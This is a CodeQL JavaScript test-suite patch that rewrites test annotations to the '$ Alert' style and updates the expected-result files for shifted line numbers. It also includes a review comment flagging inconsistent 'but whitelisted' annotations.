{} } function defaultPattern(obj, arr) { let { prop = 0 } = obj; - if (prop > 0) {} // OK + if (prop > 0) {} let [ elm = 0 ] = arr; - if (elm > 0) {} // OK + if (elm > 0) {} } diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js index 7e198d0e0293..a8064ae69429 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js @@ -2,5 +2,5 @@ function test() { let x = (function() { if (g) return 5; })(); - if (x + 1 < 5) {} // OK + if (x + 1 < 5) {} } diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js index fe4bb6486ce0..d698b7d1c29e 100644 
--- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js @@ -30,7 +30,7 @@ function test(a, b) { if ((new X())){} x = 0n; - if (x) // NOT OK + if (x) // $ Alert ; } @@ -40,7 +40,7 @@ async function awaitFlow(){ if (y) v = await f() - if (v) { // OK + if (v) { } } @@ -57,29 +57,29 @@ async function awaitFlow(){ var unknown = unknownF(); if (unknown) return; - if (unknown) // NOT OK + if (unknown) // $ Alert return; }); (function (...x) { - x || y // NOT OK + x || y // $ Alert }); (function() { function f1(x) { - x || y // NOT OK, but whitelisted + x || y // $ Alert - but whitelisted } f1(true); function f2(x) { while (true) - x || y // NOT OK + x || y // $ Alert } f2(true); function f3(x) { (function(){ - x || y // NOT OK, but whitelisted + x || y // $ Alert - but whitelisted }); } f3(true); 
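Review bot: In the `@@ -57,29` hunk of `UselessConditional.js`, `x || y // $ Alert - but whitelisted` (in `f1` and `f3`) asserts that an alert is produced, yet its own explanation says the result is suppressed. The old text `NOT OK, but whitelisted` described code the query deliberately does not report. The same contradiction appears in the later hunks of this file: `if (v) { // $ Alert - but not detected due to SSA limitations` in `@@ -145,12` and `@@ -160,12`, and `if (!x && something()) { // $ Alert - but whitelisted` in `@@ -173,14`. Elsewhere this commit turns "NOT OK - but not flagged" into `// $ MISSING: Alert`, so these lines should probably read `// $ MISSING: Alert - whitelisted` and `// $ MISSING: Alert - not detected due to SSA limitations`. As written they will fail as missing results once the annotations are enforced, or else quietly record the wrong intent.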
@@ -91,52 +91,52 @@ async function awaitFlow(){ (function (x, y) { if (!x) { - while (x) { // NOT OK + while (x) { // $ Alert f(); } - while (true) { // OK + while (true) { break; } - if (true && true) {} // NOT OK - if (y && x) {} // NOT OK - if (y && (x)) {} // NOT OK - do { } while (x); // NOT OK + if (true && true) {} // $ Alert + if (y && x) {} // $ Alert + if (y && (x)) {} // $ Alert + do { } while (x); // $ Alert } }); (function(x,y) { - let obj = (x && {}) || y; // OK - if ((x && {}) || y) {} // NOT OK + let obj = (x && {}) || y; + if ((x && {}) || y) {} // $ Alert }); (function(){ function constantFalse1() { return false; } - if (constantFalse1()) // OK + if (constantFalse1()) return; function constantFalse2() { return false; } let constantFalse = unknown? constantFalse1 : constantFalse2; - if (constantFalse2()) // OK + if (constantFalse2()) return; function constantUndefined() { return undefined; } - if (constantUndefined()) // NOT OK + if (constantUndefined()) // $ Alert return; function constantFalseOrUndefined1() { return unknown? false: undefined; } - if (constantFalseOrUndefined1()) // NOT OK + if (constantFalseOrUndefined1()) // $ Alert return; let constantFalseOrUndefined2 = unknown? constantFalse1 : constantUndefined; - if (constantFalseOrUndefined2()) // NOT OK + if (constantFalseOrUndefined2()) // $ Alert return; }); @@ -145,12 +145,12 @@ async function awaitFlow(){ function p() { return {}; } - if (p()) { // NOT OK + if (p()) { // $ Alert } var v = p(); - if (v) { // NOT OK + if (v) { // $ Alert } - if (v) { // NOT OK, but not detected due to SSA limitations + if (v) { // $ Alert - but not detected due to SSA limitations } }); 
@@ -160,12 +160,12 @@ async function awaitFlow(){ if (e) return e; throw new Error(); } - if(findOrThrow()){ // NOT OK + if(findOrThrow()){ // $ Alert } var v = findOrThrow(); - if (v) { // NOT OK + if (v) { // $ Alert } - if (v) { // NOT OK, but not detected due to SSA limitations + if (v) { // $ Alert - but not detected due to SSA limitations } }); @@ -173,14 +173,14 @@ async function awaitFlow(){ function f(){ return { v: unkown };} f(); var { v } = f(); - if (v) { // OK + if (v) { } }); (function() { function outer(x) { addEventListener("click", () => { - if (!x && something()) { // NOT OK, but whitelisted + if (!x && something()) { // $ Alert - but whitelisted something(); } }); diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js index 7b3888c982a4..74e2c0f2439f 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js 
@@ -11,90 +11,90 @@ function getLastLine(input) { function f1() { return false } - if(f1()){} // OK, whitelisted + if(f1()){} // OK - whitelisted function f2() { return false } - if(!f2()){} // OK, whitelisted + if(!f2()){} // OK - whitelisted function f3() { return false } - if(!!f3()){} // OK, whitelisted + if(!!f3()){} // OK - whitelisted function f4() { return false } - if(f4() || o.p){} // OK, whitelisted + if(f4() || o.p){} // OK - whitelisted function f5() { return false } var v5 = f5(); - if(v5){} // OK, whitelisted + if(v5){} // OK - whitelisted function f6() { return false } var v6 = f6(); - if(!!v6){} // OK, whitelisted + if(!!v6){} // OK - whitelisted })(); (function tooGeneralFunctions(){ function f1(x) { - if(x){} // OK, whitelisted + if(x){} // OK - whitelisted } f1(undefined); f1({}); function f2(x) { - if(x){} // OK, whitelisted + if(x){} // OK - whitelisted } f2(undefined); function f3(x1) { var x2 = x1; - if(x2){} // NOT OK, not whitelisted + if(x2){} // $ Alert - not whitelisted } f3(undefined); function f4(x) { - if(x && o.p){} // OK, whitelisted + if(x && o.p){} // OK - whitelisted } f4(undefined); function f5(x, y) { var xy = o.q? x: y; - if(xy && o.p){} // NOT OK, not whitelisted + if(xy && o.p){} // $ Alert - not whitelisted } f5(undefined, undefined); function f6(x) { - if(!x){} // OK, whitelisted + if(!x){} // OK - whitelisted } f6(true); function f7(x) { - if(!!x){} // OK, whitelisted + if(!!x){} // OK - whitelisted } f7(true); function f8(x, y) { var xy = x || y; - if(xy){} // NOT OK, not whitelisted + if(xy){} // $ Alert - not whitelisted } f8(undefined, undefined); function f9(x, y) { var xy = !x || y; - if(xy){} // OK, whitelisted + if(xy){} // OK - whitelisted } f9(undefined, undefined); function f10(x, y) { var xy = !!x || y; - if(xy){} // NOT OK, not whitelisted + if(xy){} // $ Alert - not whitelisted } f10(undefined, undefined); 
@@ -103,7 +103,7 @@ function getLastLine(input) { (function(){ function g(p) { return function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted g(p); } }; @@ -111,7 +111,7 @@ function getLastLine(input) { function f(p = false) { return function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted f(p); } }; @@ -119,7 +119,7 @@ function getLastLine(input) { function h(p = false) { (function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted } }); diff --git a/javascript/ql/test/query-tests/Vue/tst.js b/javascript/ql/test/query-tests/Vue/tst.js index 27fe31488cbf..f0889596112a 100644 --- a/javascript/ql/test/query-tests/Vue/tst.js +++ b/javascript/ql/test/query-tests/Vue/tst.js @@ -1,16 +1,16 @@ let Vue = require('vue'); new Vue( { - created: () => this, // NOT OK + created: () => this, // $ Alert computed: { - x: () => this, // NOT OK - y: { get: () => this }, // NOT OK - z: { set: () => this } // NOT OK + x: () => this, // $ Alert + y: { get: () => this }, // $ Alert + z: { set: () => this } // $ Alert }, methods: { - arrow: () => this, // NOT OK - nonArrow: function() { this; }, // OK - arrowWithoutThis: () => 42, // OK - arrowWithNestedThis: () => (() => this) // OK + arrow: () => this, // $ Alert + nonArrow: function() { this; }, + arrowWithoutThis: () => 42, + arrowWithNestedThis: () => (() => this) } }); diff --git a/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js b/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js index e6c6509eca6e..652853b992e9 100644 --- a/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js +++ b/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js @@ -31,7 +31,7 @@ var g2 = function() { return arguments[0] * arguments[1]; } -// OK: only five statements +// OK - only five statements function h() { if (arguments.length == 0) return 23; From 426edd55f2dd3a5fbec9eeb09ea17fe869de12ce Mon Sep 17 00:00:00 2001 
From: Asger F Date: Thu, 6 Feb 2025 14:33:21 +0100 Subject: [PATCH 047/892] JS: Update output after line number change Some OK-style comments had to be moved to the following line, shifting line numbers. In selected range also included the comments themselves. Lastly, the result sets were reordered by the CLI in some cases. --- .../RepeatedInjection.expected | 4 +- .../UnusedAngularDependency.expected | 2 +- .../AngularJS/UseNgSrc/UseNgSrc.expected | 10 +- .../DOM/HTML/AmbiguousIdAttribute.expected | 2 +- .../DOM/HTML/ConflictingAttributes.expected | 4 +- .../DOM/HTML/DuplicateAttributes.expected | 4 +- .../DOM/HTML/MalformedIdAttribute.expected | 4 +- .../DOM/TargetBlank/TargetBlank.expected | 10 +- .../AssignmentToConst.expected | 14 +- .../ClobberingVarInit.expected | 2 +- .../DeadStoreOfGlobal.expected | 2 +- .../DeadStoreOfLocal.expected | 24 +- .../DuplicateVarDecl.expected | 2 +- .../MissingThisQualifier.expected | 12 +- .../MissingVarDecl/MissingVarDecl.expected | 14 +- .../MixedStaticInstanceThisAccess.expected | 6 +- .../TemporalDeadZone.expected | 2 +- .../UnusedParameter/UnusedParameter.expected | 6 +- .../UnusedVariable/UnusedVariable.expected | 2 +- .../EnablingNodeIntegration.expected | 2 +- .../BitwiseSignCheck.expected | 4 +- .../CompareIdenticalValues.expected | 2 +- .../ExprHasNoEffect/ExprHasNoEffect.expected | 16 +- .../HeterogeneousComparison.expected | 100 +- .../ImplicitOperandConversion.expected | 34 +- .../MisspelledIdentifier.expected | 12 +- .../SelfAssignment/SelfAssignment.expected | 6 +- .../SuspiciousInvocation.expected | 2 +- .../WhitespaceContradictsPrecedence.expected | 2 +- .../UndocumentedParameter.expected | 4 +- .../BadTypeof/BadTypeof.expected | 6 +- .../ExpressionClosures.expected | 2 +- .../LengthComparisonOffByOne.expected | 14 +- .../NonLinearPattern.expected | 22 +- .../PropertyWriteOnPrimitive.expected | 6 +- .../SetterIgnoresParameter.expected | 4 +- .../SetterReturn/SetterReturn.expected | 2 +- 
.../SpuriousArguments.expected | 28 +- .../StrictModeCallStackIntrospection.expected | 14 +- .../YieldInNonGenerator.expected | 2 +- .../NonLocalForIn/NonLocalForIn.expected | 10 +- .../ReassignParameterAndUseArguments.expected | 2 +- .../BackrefIntoNegativeLookahead.expected | 2 +- .../UnboundBackref/UnboundBackref.expected | 8 +- .../UnmatchableCaret.expected | 6 +- .../UnmatchableDollar.expected | 8 +- .../CWE-022/TaintedPath/TaintedPath.expected | 744 +++++------ .../UselessUseOfCat/UselessUseOfCat.expected | 2 +- .../Security/CWE-079/DomBasedXss/Xss.expected | 1122 ++++++++--------- .../XssWithAdditionalSources.expected | 934 +++++++------- .../ReflectedXss/ReflectedXss.expected | 232 ++-- .../ReflectedXssWithCustomSanitizer.expected | 44 +- .../UnsafeJQueryPlugin.expected | 22 +- .../CWE-089/untyped/DatabaseAccesses.expected | 82 +- .../CWE-089/untyped/SqlInjection.expected | 788 ++++++------ .../CodeInjection/CodeInjection.expected | 154 +-- .../HeuristicSourceCodeInjection.expected | 112 +- .../CWE-1004/ClientExposedCookie.expected | 16 +- ...ompleteMultiCharacterSanitization.expected | 42 +- .../CWE-1275/SameSiteNoneCookie.expected | 8 +- .../CWE-200/FileAccessToHttp.expected | 18 +- .../CWE-312/BuildArtifactLeak.expected | 6 +- .../CWE-312/CleartextStorage.expected | 6 +- .../Security/CWE-367/FileSystemRace.expected | 2 +- .../ReDoS/PolynomialBackTracking.expected | 42 +- .../CWE-400/ReDoS/PolynomialReDoS.expected | 6 +- .../Security/CWE-400/ReDoS/ReDoS.expected | 34 +- .../ClientSideUrlRedirect.expected | 186 +-- .../ServerSideUrlRedirect.expected | 198 +-- .../query-tests/Security/CWE-611/Xxe.expected | 38 +- .../Security/CWE-614/ClearTextCookie.expected | 26 +- .../Security/CWE-643/XpathInjection.expected | 10 +- .../Security/CWE-730/RegExpInjection.expected | 222 ++-- .../Security/CWE-730/ServerCrash.expected | 66 +- .../Security/CWE-776/XmlBomb.expected | 38 +- .../CWE-807/ConditionalBypass.expected | 2 +- 
.../FunctionalityFromUntrustedSource.expected | 10 +- ...onfusionThroughParameterTampering.expected | 8 +- .../PrototypePollutingMergeCall.expected | 12 +- .../EphemeralLoop/EphemeralLoop.expected | 4 +- .../ImplicitReturn/ImplicitReturn.expected | 6 +- .../InconsistentLoopOrientation.expected | 6 +- .../NestedLoopsSameVariable.expected | 2 +- .../ReturnAssignsLocal.expected | 4 +- .../ReturnOutsideFunction.expected | 2 +- ...iciousUnusedLoopIterationVariable.expected | 8 +- 86 files changed, 2855 insertions(+), 2855 deletions(-) diff --git a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected index 227dcedf486c..ceb747011ba8 100644 --- a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected +++ b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected 
@@ -2,5 +2,5 @@ | repeated-injection.js:6:5:6:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:8:54:8:73 | ['name', $Injected2] | dependency injections | | repeated-injection.js:10:5:10:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:11:5:11:22 | $Injected3.$inject | dependency injections | | repeated-injection.js:10:5:10:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:12:5:12:22 | $Injected3.$inject | dependency injections | -| repeated-injection.js:33:5:33:84 | functio ... )\\n } | This function has $@ defined in multiple places. | repeated-injection.js:35:5:35:23 | $Injected10.$inject | dependency injections | -| repeated-injection.js:33:5:33:84 | functio ... )\\n } | This function has $@ defined in multiple places. | repeated-injection.js:36:56:36:76 | ['name' ... cted10] | dependency injections | +| repeated-injection.js:33:5:33:85 | functio ... n\\n } | This function has $@ defined in multiple places. | repeated-injection.js:35:5:35:23 | $Injected10.$inject | dependency injections | +| repeated-injection.js:33:5:33:85 | functio ... n\\n } | This function has $@ defined in multiple places. | repeated-injection.js:36:56:36:76 | ['name' ... cted10] | dependency injections | diff --git a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected index d5b4c267c39e..2ca924302a23 100644 --- a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected +++ b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected 
@@ -2,4 +2,4 @@ | unused-angular-dependency.js:14:14:14:39 | ["unuse ... n() {}] | This function has 0 parameters, but 1 dependency is injected into it. | | unused-angular-dependency.js:16:14:16:53 | ["used2 ... d2) {}] | This function has 1 parameter, but 2 dependencies are injected into it. | | unused-angular-dependency.js:17:14:17:52 | ["unuse ... n() {}] | This function has 0 parameters, but 2 dependencies are injected into it. | -| unused-angular-dependency.js:18:14:18:105 | ["used2 ... }] | This function has 1 parameter, but 2 dependencies are injected into it. | +| unused-angular-dependency.js:18:14:18:106 | ["used2 ... }] | This function has 1 parameter, but 2 dependencies are injected into it. | diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected index 5b5f5ffa00c0..bd93c005dec1 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected @@ -1,5 +1,5 @@ -| tst2.html:3:6:3:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | -| tst.html:8:6:8:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | -| tst.html:10:40:10:83 | srcset=#/resources/pics-large/{{item._id}} | Use 'ng-srcset' instead of 'srcset'. | -| tst.html:11:10:11:52 | src=#/resources/pics-default/{{item._id}} | Use 'ng-src' instead of 'src'. | -| tst_fragment.html:3:6:3:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst2.html:2:6:2:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst.html:7:6:7:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst.html:9:40:9:83 | srcset=#/resources/pics-large/{{item._id}} | Use 'ng-srcset' instead of 'srcset'. | +| tst.html:10:10:10:52 | src=#/resources/pics-default/{{item._id}} | Use 'ng-src' instead of 'src'. | +| tst_fragment.html:2:6:2:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | 
diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected index c013ea098297..3f5ebd72f8ec 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected @@ -1,3 +1,3 @@ | AmbiguousIdAttribute.html:4:5:4:14 | id=first | This element has the same id as $@. | AmbiguousIdAttribute.html:5:5:5:14 | id=first | another element | | AmbiguousIdAttribute_fragment.html:2:7:2:16 | id=first | This element has the same id as $@. | AmbiguousIdAttribute_fragment.html:3:7:3:16 | id=first | another element | -| tst.js:22:22:22:33 | id="theDiff" | This element has the same id as $@. | tst.js:22:46:22:57 | id="theDiff" | another element | +| tst.js:17:22:17:33 | id="theDiff" | This element has the same id as $@. | tst.js:17:46:17:57 | id="theDiff" | another element | diff --git a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected index 46ff575e355c..4b9243036e4f 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected 
@@ -1,3 +1,3 @@ | ConflictingAttributes.html:1:4:1:27 | href=http://semmle.com | This attribute has the same name as $@ of the same element, but a different value. | ConflictingAttributes.html:1:29:1:53 | href=https://semmle.com | another attribute | -| tst.js:6:4:6:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:6:29:6:53 | href="h ... le.com" | another attribute | -| tst.js:16:4:16:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:16:29:16:46 | href={someValue()} | another attribute | +| tst.js:5:4:5:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:5:29:5:53 | href="h ... le.com" | another attribute | +| tst.js:12:4:12:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:12:29:12:46 | href={someValue()} | another attribute | diff --git a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected index 988c4925a461..aa0a43e5d1be 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected 
@@ -1,3 +1,3 @@ | DuplicateAttributes.html:1:4:1:28 | href=https://semmle.com | This attribute $@. | DuplicateAttributes.html:1:30:1:54 | href=https://semmle.com | is duplicated later | -| tst.js:9:4:9:28 | href="h ... le.com" | This attribute $@. | tst.js:9:30:9:54 | href="h ... le.com" | is duplicated later | -| tst.js:25:17:25:28 | id="theDiff" | This attribute $@. | tst.js:25:30:25:41 | id="theDiff" | is duplicated later | +| tst.js:7:4:7:28 | href="h ... le.com" | This attribute $@. | tst.js:7:30:7:54 | href="h ... le.com" | is duplicated later | +| tst.js:19:17:19:28 | id="theDiff" | This attribute $@. | tst.js:19:30:19:41 | id="theDiff" | is duplicated later | diff --git a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected index 96d365e5dc5e..fbbfcc95d23b 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected @@ -1,5 +1,5 @@ | AmbiguousIdAttributeGood.html:8:5:8:19 | id=invalid id | The value of the id attribute must not contain any space characters. | | AmbiguousIdAttributeGood.html:9:5:9:19 | id=invalid id | The value of the id attribute must not contain any space characters. | | MalformedIdAttribute.html:1:6:1:27 | id=heading important | The value of the id attribute must not contain any space characters. | -| tst.js:12:6:12:10 | id="" | The value of the id attribute must contain at least one character. | -| tst.js:13:6:13:13 | id="a b" | The value of the id attribute must not contain any space characters. | +| tst.js:9:6:9:10 | id="" | The value of the id attribute must contain at least one character. | +| tst.js:10:6:10:13 | id="a b" | The value of the id attribute must not contain any space characters. | 
diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected index 1fba6292f897..531f431b86f9 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected @@ -2,8 +2,8 @@ | tst.html:24:1:24:48 | ... | External links without noopener/noreferrer are a potential security risk. | | tst.html:25:1:25:36 | ... | External links without noopener/noreferrer are a potential security risk. | | tst.html:30:1:30:61 | ... | External links without noopener/noreferrer are a potential security risk. | -| tst.js:18:1:18:43 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:19:1:19:58 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:20:1:20:51 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:33:12:33:39 | $(" ... X}}" }) | External links without noopener/noreferrer are a potential security risk. | -| tst.js:42:12:42:20 | $("") | External links without noopener/noreferrer are a potential security risk. | +| tst.js:17:1:17:43 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:18:1:18:58 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:19:1:19:51 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:31:12:31:39 | $(" ... X}}" }) | External links without noopener/noreferrer are a potential security risk. | +| tst.js:39:12:39:20 | $("") | External links without noopener/noreferrer are a potential security risk. | diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected index b74841153cb3..7e457d64b08e 100644 
--- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected 
@@ -1,7 +1,7 @@ -| classes.js:4:1:4:10 | class C {} | Assignment to variable C, which is $@ constant. | classes.js:1:1:1:13 | const C = 45; | declared | -| functions.js:4:10:4:10 | C | Assignment to variable C, which is $@ constant. | functions.js:1:1:1:13 | const C = 45; | declared | -| tst.js:4:1:4:6 | x = 42 | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:7:1:7:6 | y = 23 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:10:5:10:10 | y = -1 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:13:1:13:3 | ++x | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:25:10:25:14 | [ c ] | Assignment to variable c, which is $@ constant. | tst.js:24:5:24:19 | const c = null; | declared | +| classes.js:3:1:3:10 | class C {} | Assignment to variable C, which is $@ constant. | classes.js:1:1:1:13 | const C = 45; | declared | +| functions.js:3:10:3:10 | C | Assignment to variable C, which is $@ constant. | functions.js:1:1:1:13 | const C = 45; | declared | +| tst.js:3:1:3:6 | x = 42 | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:5:1:5:6 | y = 23 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:7:5:7:10 | y = -1 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:9:1:9:3 | ++x | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:21:10:21:14 | [ c ] | Assignment to variable c, which is $@ constant. | tst.js:20:5:20:19 | const c = null; | declared | 
diff --git a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected index 7063b316a62e..501e442bcbf2 100644 --- a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected +++ b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected @@ -1 +1 @@ -| tst.js:3:24:3:36 | key = iter[1] | This initialization of key overwrites an $@. | tst.js:3:9:3:21 | key = iter[0] | earlier initialization | +| tst.js:2:24:2:36 | key = iter[1] | This initialization of key overwrites an $@. | tst.js:2:9:2:21 | key = iter[0] | earlier initialization | diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected index 3c4777ca5a6f..d4f34fa75983 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected @@ -1,2 +1,2 @@ -| tst.js:2:1:2:1 | g | This definition of g is useless, since its value is never read. | +| tst.js:1:1:1:1 | g | This definition of g is useless, since its value is never read. | | worker.js:3:1:3:9 | onmissage | This definition of onmissage is useless, since its value is never read. | diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected index 88b5fc55b25c..8d5b7af35dab 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected 
@@ -1,13 +1,13 @@ | overload.ts:10:12:10:14 | baz | The value assigned to baz here is unused. | -| tst2.js:26:9:26:14 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst2.js:28:9:28:14 | x = 42 | The value assigned to x here is unused. | -| tst3.js:2:1:2:36 | exports ... a: 23 } | The value assigned to exports here is unused. | -| tst3b.js:2:18:2:36 | exports = { a: 23 } | The value assigned to exports here is unused. | -| tst.js:6:2:6:7 | y = 23 | The value assigned to y here is unused. | -| tst.js:13:6:13:11 | a = 23 | The initial value of a is unused, since it is always overwritten. | -| tst.js:13:14:13:19 | a = 42 | The value assigned to a here is unused. | -| tst.js:45:6:45:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst.js:51:6:51:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst.js:132:7:132:13 | {x} = o | The initial value of x is unused, since it is always overwritten. | -| tst.js:162:6:162:14 | [x] = [0] | The initial value of x is unused, since it is always overwritten. | -| tst.js:172:7:172:17 | nSign = foo | The value assigned to nSign here is unused. | +| tst2.js:25:9:25:14 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst2.js:27:9:27:14 | x = 42 | The value assigned to x here is unused. | +| tst3.js:1:1:1:36 | exports ... a: 23 } | The value assigned to exports here is unused. | +| tst3b.js:1:18:1:36 | exports = { a: 23 } | The value assigned to exports here is unused. | +| tst.js:5:2:5:7 | y = 23 | The value assigned to y here is unused. | +| tst.js:11:6:11:11 | a = 23 | The initial value of a is unused, since it is always overwritten. | +| tst.js:11:14:11:19 | a = 42 | The value assigned to a here is unused. | +| tst.js:43:6:43:11 | x = 23 | The initial value of x is unused, since it is always overwritten. 
| +| tst.js:49:6:49:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst.js:130:7:130:13 | {x} = o | The initial value of x is unused, since it is always overwritten. | +| tst.js:160:6:160:14 | [x] = [0] | The initial value of x is unused, since it is always overwritten. | +| tst.js:170:7:170:17 | nSign = foo | The value assigned to nSign here is unused. | diff --git a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected index 60d8f7f619e3..26ac43a1dfa2 100644 --- a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected +++ b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected @@ -1 +1 @@ -| tst.js:2:11:2:16 | a = 42 | Variable a has already $@. | tst.js:2:5:2:5 | a | been previously declared | +| tst.js:1:11:1:16 | a = 42 | Variable a has already $@. | tst.js:1:5:1:5 | a | been previously declared | diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected index c9bd449006f4..60a075561957 100644 --- 